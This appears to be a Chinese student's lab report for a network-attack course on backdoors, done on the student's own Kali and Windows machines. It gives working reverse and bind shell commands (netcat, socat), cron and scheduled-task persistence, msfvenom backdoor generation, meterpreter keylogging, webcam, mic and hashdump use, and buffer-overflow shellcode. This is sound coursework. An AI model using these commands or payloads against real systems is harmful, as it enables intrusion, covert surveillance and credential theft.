2018-2019-2 网络对抗技术 20165318 Exp2 后门原理与实践
- 后门的基本概念及基础问题回答
- 常用后门工具
- netcat
- Win获得Linux Shell
- Linux获得Win Shell
- Meterpreter
- netcat
- 实验内容
- 任务一:使用netcat获取主机操作Shell,cron启动
- 任务二:使用socat获取主机操作Shell, 任务计划启动
- 任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
- 任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
- 任务五:可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell
- 实验遇到的问题及解决方法
- 实验总结与体会
后门的基本概念及基础问题回答
一、后门的概念
- 未认证、隐通道、专门应用
- 程序、投送、启动、隐藏
二、基础问题回答
- 问:例举你能想到的一个后门进入到你系统中的可能方式?
- 当我们打开一个网页时,如果该网页会自动链接到木马程序的话,就会在后台自动下载安装木马的安装程序,并会自动安装木马,生成可执行文件,以此在系统留下后门。
- 或者在非官方网站下载应用程序时,该应用程序可能绑定了一些可执行文件,因此留下后门。
- 问:例举你知道的后门如何启动起来(win及linux)的方式?
- Windows:设置为开机自启动、修改注册表项、用户执行带有后门的可执行文件
- Linux:通过crontab功能将后门设为定时启动;也可以通过对正常软件绑定注入shellcode
- 问:Meterpreter有哪些给你映像深刻的功能?
- 在植入后门后,可以控制被控主机的shell,执行指令;获取被控主机的录音、录像、截图、键盘输入记录等。
- 问:如何发现自己有系统有没有被安装后门?
- 打开防火墙,查看有没有异常开放的端口;
- 安装杀毒软件,实时监控电脑,定时对系统进行检测;
- 查看任务计划程序、开机自启动项、注册表项中是否有可疑程序。
返回目录
常用后门工具
netcat
Windows获得Linux Shell
- 在Windows下使用
ipconfig
查看本机IP
- 使用ncat.exe程序打开监听
ncat.exe -l -p 5318
- 在kali中反弹连接Windows,
ncat 169.254.175.85 5318 -e /bin/sh
,使用-e
选项执行shell程序
- Windows成功获得kali的shell
Linux获得Windows Shell
- 在kali中使用
ifconfig
查看IP
- 打开监听
nc -l -p 5318
- 在Windows中反弹连接kali,
ncat.exe -e cmd.exe 192.168.208.129 5318
- kali成功获得Windows的命令提示
使用nc传输数据
Windows下监听
5318
端口,ncat.exe -l 5318
kali反弹连接到Windows的
5318
端口,nc 169.254.175.85 5318
连接建立成功,双方可以相互传输数据
使用nc传输文件(将文件从kali传给Windows)
Windows下监听
5318
端口,并把收到的数据保存到file1.out
中,ncat.exe -l 5318 > file1.out
kali反弹连接到Windows的
5318
端口,nc 169.254.175.85 5318 < file1.in
连接建立成功,Win可以收到kali发来的文件。
使用nc传输文件(将文件从Windows传给kali)
kali下监听
5318
端口,并把收到的数据保存到file2.out
中,nc -l 22 > file2.out
Windows反弹连接到kali的
22
端口,ncat.exe 192.168.208.129 22 < file2.in
连接建立成功,kali可以收到Windows发来的文件。
返回目录
Meterpreter
- 后门就是一个程序。
- 传统的理解是:有人编写一个后门程序,大家拿来用。后来有人编写一个平台能生成后门程序。这个平台把后门的
- 基本功能(基本的连接、执行指令),
- 扩展功能(如搜集用户信息、安装服务等功能),
- 编码模式,
- 运行平台,
- 以及运行参数
- 全都做成零件或可调整的参数。用的时候按需要组合,就可以生成一个可执行文件。
- 典型的平台就包括有:
- intersect
- Metaspolit的msfvenom指令
- Veil-evasion
在下面的任务三中我们就用到了Metaspolit的msfvenom指令
- 参数说明
- -p 使用的payload。payload翻译为有效载荷,就是被运输有东西。这里windows/meterpreter/reverse_tcp就是一段shellcode.
- -x 使用的可执行文件模板,payload(shellcode)就写入到这个可执行文件中。
- -e 使用的编码器,用于对shellcode变形,为了免杀。
- -i 编码器的迭代次数。如上即使用该编码器编码5次。
- -b badchar是payload中需要去除的字符。
- LHOST 是反弹回连的IP
- LPORT 是回连的端口
- -f 生成文件的类型
>
输出到哪个文件
Meterpreter更多指令
meterpreter > help
Core Commands第一部分是核心指令
=============Command Description------- -----------? Help menubackground Backgrounds the current sessionbgkill Kills a background meterpreter scriptbglist Lists running background scriptsbgrun Executes a meterpreter script as a background threadchannel Displays information or control active channelsclose Closes a channeldisable_unicode_encoding Disables encoding of unicode stringsenable_unicode_encoding Enables encoding of unicode stringsexit Terminate the meterpreter sessionget_timeouts Get the current session timeout valueshelp Help menuinfo Displays information about a Post moduleirb Drop into irb scripting modeload Load one or more meterpreter extensionsmachine_id Get the MSF ID of the machine attached to the sessionmigrate Migrate the server to another processquit Terminate the meterpreter sessionread Reads data from a channelresource Run the commands stored in a filerun Executes a meterpreter script or Post moduleset_timeouts Set the current session timeout valuessleep Force Meterpreter to go quiet, then re-establish session.transport Change the current transport mechanismuse Deprecated alias for 'load'uuid Get the UUID for the current sessionwrite Writes data to a channelStdapi: File system Commands第二部分是文件系统相关的
============================Command Description------- -----------cat Read the contents of a file to the screencd Change directorydir List files (alias for ls)download Download a file or directoryedit Edit a filegetlwd Print local working directorygetwd Print working directorylcd Change local working directorylpwd Print local working directoryls List filesmkdir Make directorymv Move source to destinationpwd Print working directoryrm Delete the specified filermdir Remove directorysearch Search for filesshow_mount List all mount points/logical drivesupload Upload a file or directoryStdapi: Networking Commands当然少不了网络操作的了
===========================Command Description------- -----------arp Display the host ARP cachegetproxy Display the current proxy configurationifconfig Display interfacesipconfig Display interfacesnetstat Display the network connectionsportfwd Forward a local port to a remote serviceresolve Resolve a set of host names on the targetroute View and modify the routing tableStdapi: System Commands系统指令
=======================Command Description------- -----------clearev Clear the event logdrop_token Relinquishes any active impersonation token.execute Execute a commandgetenv Get one or more environment variable valuesgetpid Get the current process identifiergetprivs Attempt to enable all privileges available to the current processgetsid Get the SID of the user that the server is running asgetuid Get the user that the server is running askill Terminate a processps List running processesreboot Reboots the remote computerreg Modify and interact with the remote registryrev2self Calls RevertToSelf() on the remote machineshell Drop into a system command shellshutdown Shuts down the remote computersteal_token Attempts to steal an impersonation token from the target processsuspend Suspends or resumes a list of processessysinfo Gets information about the remote system, such as OSStdapi: User interface Commands用户接口,可以抓取击键记录
===============================Command Description------- -----------enumdesktops List all accessible desktops and window stationsgetdesktop Get the current meterpreter desktopidletime Returns the number of seconds the remote user has been idlekeyscan_dump Dump the keystroke bufferkeyscan_start Start capturing keystrokeskeyscan_stop Stop capturing keystrokesscreenshot Grab a screenshot of the interactive desktopsetdesktop Change the meterpreters current desktopuictl Control some of the user interface componentsStdapi: Webcam Commands
=======================Command Description------- -----------record_mic Record audio from the default microphone for X secondswebcam_chat Start a video chatwebcam_list List webcamswebcam_snap Take a snapshot from the specified webcamwebcam_stream Play a video stream from the specified webcamPriv: Elevate Commands提权
======================Command Description------- -----------getsystem Attempt to elevate your privilege to that of local system.***我的win7没成功***Priv: Password database Commands导出密码文件SAM
================================Command Description------- -----------hashdump Dumps the contents of the SAM databasePriv: Timestomp Commands修改文件操作时间,清理现场用
========================Command Description------- -----------timestomp Manipulate file MACE attributes
返回目录
实验内容
任务一:使用netcat获取主机操作Shell,cron启动
Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。详细说明可以"man cron"。
在Windows系统下,监听
5318
端口在Kali环境下,用
crontab -e
指令编辑一条定时任务,(crontab指令增加一条定时任务,"-e"表示编辑)选择编辑器时选择3
(第一次会提示选择编辑器,以后就不会提示了);在最后一行添加
26 * * * * /bin/netcat 169.254.175.85 5318 -e /bin/sh
,意思是在每个小时的第26分钟反向连接Windows主机的5318端口,设置成26的原因是我当时的时间是16点24,为了能立马看到效果,所以我将时间设置成了26;
- 但时间到达26分钟时如下图所示:
返回目录
任务二:使用socat获取主机操作Shell, 任务计划启动
socat:
- socat是ncat的增强版,它使用的格式是socat [options] <address> <address>
,其中两个address
是必选项,而options
是可选项。
- socat的基本功能就是建立两个双向的字节流,数据就在其间传输,参数address
就是代表了其中的一个方向。所谓流,代表了数据的流向,而数据则可以有许多不同的类型,命令中也就相应需要许多选项对各种不同的类型数据流进行限定与说明。
搜索打开“计算机管理”
在“任务计划程序”中“创建任务”
填写任务名->新建一个触发器
在操作->程序或脚本中选择你的
socat.exe
文件的路径,在添加参数一栏填写tcp-listen:5318 exec:cmd.exe,pty,stderr
,这个命令的作用是把cmd.exe
绑定到端口5318
,同时把cmd.exe
的stderr
重定向到stdout
上:
- 创建完成之后,按Windows+L快捷键锁定计算机,再次打开时,可以发现之前创建的任务已经开始运行
- 此时,在Kali环境下输入指令
socat - tcp:169.254.175.85:5318
,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的5318
端口,此时可以发现已经成功获得了一个cmd shell
返回目录
任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
在Kali上执行指令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.208.129 LPORT=5318 -f exe > 20165318_backdoor.exe
,注意这里的IP地址为控制端IP,即LinuxIP,可见已经生成了后门程序“20165318_backdoor.exe”
在Windows下执行
ncat.exe -l 5318 > 20165318_backdoor.exe
,这样被控主机就进入了接收文件模式,也可以使用ncat.exe -lv 5318 > 20165318_backdoor.exe
指令,通过-lv
选项看到当前的连接状态,下面这个图是文件传输成功的截图
在Linux中执行
nc 169.254.175.85 5318 < 20165318_backdoor.exe
,注意这里的IP为被控主机IP,即WindowsIP传送接收文件成功,如下图所示
在Kali上使用msfconsole指令进入msf控制台,这时候我们能看到一个可爱的小人~而且每次打开都是不一样的图案!
输入
use exploit/multi/handler
使用监听模块,设置payloadset payload windows/meterpreter/reverse_tcp
,使用和生成后门程序时相同的payloadset LHOST 192.168.208.129
,这里用的是LinuxIP,和生成后门程序时指定的IP相同set LPORT 5318
,同样要使用相同的端口
设置完成后,执行监听
运行Windows下的后门程序
此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell
返回目录
任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
使用
record_mic
指令可以截获一段音频,可以用-d
选项设置录制时间
使用
webcam_snap
指令可以使用摄像头进行拍照
使用
keyscan_start
指令开始记录下击键的过程,使用keyscan_dump
指令读取击键的记录
使用
screenshot
指令可以进行截屏,效果如下:
先使用
getuid
指令查看当前用户,使用getsystem
指令进行提权
也可以用
webcam stream
指令可以使用摄像头进行录像sysinfo
获得目标系统的信息,机器名、操作系统等ps
获得受害者机上运行的进程信息migrate []
命令,例如我把msf会话移植到1588 中,是explorer.exe,稳定的系统服务。从头想起,我们的实验是把受害者绑起来给他植入后门,很无脑。如果是正常的利用系统漏洞、浏览器漏洞溢出而得到的会话,比如IE浏览器,那么msf meterpreter代码存在于IE的内存空间中,那边关掉IE浏览器,msf会话就没了,但是若存在于 -explorer这样稳定的系统服务中,就能一直用。而且,这种移植是“无缝移植”,不用断开已有的TCP连接。execute
命令,例如我直接与win的cmd.exe交互,输入 execute -H -i -f cmd.exe ,得到下图所示的shellupload / download
命令,顾名思义——往受害机传/从受害机下载文件
返回目录
任务五:可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell
通过学习学姐的博客我了解到msf可以自己根据程序生成可执行的后门。于是,我使用msf将shellcode注入到pwn1.0(老师给的原始文件)中,生成可执行文件pwn2,学姐的博客中有详细介绍各种指令怎么组合的,下面我就只简单说一下我的过程。
- 使用命令
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.208.129 LPORT=5318 -x /root/20165318sxx/exp2/pwn1.0 -f elf > pwn2
,由于在windowns中没有可以执行pwn文件的程序,我将后门程序生成在了kali中,因此版本为linux/x86
,需要被注入的文件是/root/20165318sxx/exp2/pwn1.0
之后输入
msfconsole
启动,并打开监听(过程与任务三相同,我就不一一赘述了)在kali上运行后门文件pwn2,注意!在kali中执行pwn2时应先加权限 chmod +x pwn2
这时可以获得kali的shell
虽然上面的这种方法可以得到shell,但与实验目的不同。下面的才是符合要求的!!!
这一项的要求:生成shellcode,注入pwn1文件,运行pwn1文件,pwn1进程经过缓冲区溢出后返回到shellcode的起始地址,然后开始去反弹连接坏人,坏人获得受害者的shell(这里面坏人和受害者都是kali)
- 具体步骤如下:
- 在这个shellcode网站,上面生成的的shellcode都是经过测试过可用的。在网站里找一个linux/x86平台的,反弹连接的shellcode,下载,复制出里面的机器码。我选择的是下面这个,代码如下所示,其中的端口号和主机号也可以修改(但我在本次实验过程中没有修改)
- 然后参考实验一找到shell code的起始地址(注意要关闭地址随机化) 并加在这段shellcode前面,并用其生成input_2文件。
perl -e 'print "A" x 32;print"\x50\xd3\xff\xff\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80"' > input_2
- 然后在另一个终端中打开msfconsole,并打开监听
use exploit/multi/handler set payload linux/x86/shell_reverse_tcp set LHOST 127.0.0.1 set LPORT 4444 //这两个都是根据你的shellcode来的 show options exploit
- 在原终端
(cat input_2;cat) | ./pwn1
运行pwn1并回车,另一边就可以得到shell了。
- 在这个shellcode网站,上面生成的的shellcode都是经过测试过可用的。在网站里找一个linux/x86平台的,反弹连接的shellcode,下载,复制出里面的机器码。我选择的是下面这个,代码如下所示,其中的端口号和主机号也可以修改(但我在本次实验过程中没有修改)
返回目录
实验遇到的问题及解决方法
问题:在做使用nc传输文件时,想将文件从win传到kali中,却一直提示由于目标计算机积极拒绝,无法连接..
- 解决方法:参考Kali如何开启SSH
- 输入指令
netstat -tlnp
查看ssh是否打开,如果没有看见TCP端口22,则SSH服务没有运行。 - 首先,编辑 sshd_config 文件,允许远程登入。
- 命令:
vim /etc/ssh/sshd_config
- 将 #PasswordAuthentication yes 修改为:PasswordAuthentication yes
- 将 #PermitRootLogin yes 修改为:PermitRootLogin yes?
- 按
:wq
保存文件并退出. - 其次,运行如下命令将SSHD服务设置为开机自启动:
update-rc.d ssh enable
- 也可以用
/etc/init.d/ssh start
或service ssh start
打开ssh - 查看SSH服务状态是否正在运行,命令为:
/etc/init.d/ssh status
或service ssh status
注意!!!在使用ssh传输文件时,一定要用ssh固定的端口22,用其他端口还是提示同样的错误!
- 输入指令
返回目录
实验总结与体会
- 在2017年学院的信安大赛微视演绎环节的作品《机要风云》给我留下了很深的影响。作品中一名饰演黑客的学长熟练地运用后门技术,简单的敲击了几下键盘,就远程控制了因主人公误操作而感染木马的涉密主机,然后调用摄像头截屏并获取本地机密文件,当时觉得这波操作简直超级炫酷!没想到现在的我也能做类似的事情,当第一次在攻击机上执行被控主机的shell,还是挺高兴的。在逐步实现一个个任务,最后调取被控主机录像的时候,心中的成就感油然而生,哈哈哈。
- 虽然现在的我仅仅只是了解后门的基本原理,掌握了最基本的后门的生成、投送、启动,但有了现在的基础,一步步循序渐进,我会学到更深入的知识~
- 同时,我也更认识到系统防范入侵的能力之低的事实,也使我对一些常见的攻击有了基础的了解,提高了自己的安全意识。
返回目录
转载于:https://www.cnblogs.com/sunxiaoxuan/p/10559284.html
2018-2019-2 网络对抗技术 20165318 Exp2 后门原理与实践相关推荐
- 2018-2019-2 网络对抗技术 20165301 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165301 Exp2 后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任 ...
- 2019-2020-2 20175227张雪莹《网络对抗技术》 Exp2 后门原理与实践
2019-2020-2 20175227张雪莹<网络对抗技术> Exp2 后门原理与实践 目录 0. 基础知识 1. 实验内容 1.0 常用后门工具 1.1 使用netcat获取主机操作S ...
- 2017-2018-2 20155314《网络对抗技术》Exp2 后门原理与实践
2017-2018-2 20155314<网络对抗技术>Exp2 后门原理与实践 目录 实验要求 实验内容 实验环境 预备知识 1.后门概念 2.常用后门工具 实验步骤 1 用nc或net ...
- 2018-2019-2 20165212《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165212<网络对抗技术>Exp2 后门原理与实践 1.实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作 ...
- 20165214 2018-2019-2 《网络对抗技术》Exp2 后门原理与实践 Week4
<网络对抗技术>Exp2 PC平台逆向破解之"MAL_简单后门" Week4 一.实验内容 本次实验对象为名为pwn1的pwn1的linux可执行文件.程序正常执行流程 ...
- 2018-2019-2 网络对抗技术 20165320 Exp2 后门原理与实践
后门原理与实践 windows获取Linux操作Shell 获取本机的IP netcat介绍:一个进行基本的TCP.UDP数据收发的工具 相关的参数与具体用法 windows打开监听: ncat.ex ...
- 2018-2019-2 20165303《网络对抗技术》Exp2 后门原理与实践
实验内容 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell, 任务计划启动 (0.5分) (3)使用MSF meterpreter( ...
- 2018-2019-2 网络对抗技术 20165328 Exp2 后门原理与实践
实验内容: 任务一:使用netcat获取主机操作Shell,cron启动 任务二:使用socat获取主机操作Shell, 任务计划启动 任务三:使用MSF meterpreter(或其他软件)生成可执 ...
- 2018-2019-2 20165234 《网络对抗技术》 Exp2 后门原理与实践
实验二 后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter(或其 ...
最新文章
- python相关函数_python常用函数精讲
- Python 懂车帝全车系销量排行榜
- 如何办理夫妻间的房屋产权转移手续?
- php 匹配一次,PHP Regex匹配最后一次出现的字符串
- asp.net怎样解决高并发问题
- Flask开发微电影网站(二)
- diff git 代码实现_Git diff 算法
- ZooKeeper、Eureka谁是最好的注册中心?
- net空间一次购买终身使用_net域名与org域名哪个投资价值更高?
- react组件卸载调用的方法_React调用子组件方法与命令式编程误区
- 几十m的中文linux系统,体积只有十几M的linux系统Tiny Core安装体验
- Linux网络基础番外篇(IP、MAC、TCP)
- 【TWVRP】基于matlab遗传算法求解带时间窗+带充电桩的无人机巡检路径规划问题【含Matlab源码 YC001期】
- Qt编程之mapx组件编程
- 100 余个超实用网站
- CTFSHOW【萌新计划】Writeup
- 基于hutool实现简单的加解密
- 2022年各国程序员薪资排名!
- 微型计算机课程设计电子密码锁,《微机原理及应用》课程设计基于74LS112的电子密码锁设计报告初版...
- git的使用、ssh生成、github、Git分支操作